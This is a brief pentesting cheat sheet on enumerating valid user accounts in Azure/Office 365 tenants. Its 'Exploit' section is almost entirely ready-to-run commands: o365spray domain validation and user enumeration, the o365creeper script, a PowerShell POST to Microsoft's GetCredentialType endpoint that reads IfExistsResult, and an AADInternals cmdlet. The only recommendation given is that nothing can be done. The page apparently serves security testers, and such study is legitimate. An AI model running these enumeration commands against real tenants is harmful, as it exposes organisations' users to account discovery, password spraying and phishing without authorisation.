User Spraying

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations

Vulnerability

Knowing the domain name associated to an Azure tenant, you can perform a spraying attack to identify existing users.

Prerequisites

  • Internet connection.

Exploit

Use O365Spray.

# First, validate the domain exists.
o365spray --validate --domain $DomainName

# Then, perform user spraying.
o365spray --enum -U Usernames.txt --domain $DomainName

Using O365Creeper, you can spray emails without specifying a domain. It will output emails that belong to an Azure tenant.

# Yeah, it only works with Python 2...
python2.7 o365creeper.py -f Emails.txt -o ValidEmails.txt

You can also validate if a user exists like so.

# Returns 0 or 6 if the username exists.
Invoke-RestMethod -Uri "https://login.microsoftonline.com/common/GetCredentialType" -ContentType "application/json" -Method POST -Body (@{"username"="$Email"; "isOtherIdpSupported" =  $true}|ConvertTo-Json) | Select -ExpandProperty IfExistsResult

# With AADInternals.
Get-AADIntLoginInformation -UserName $Email

Recommendations

  • Nothing to do here, this exploit is possible by design.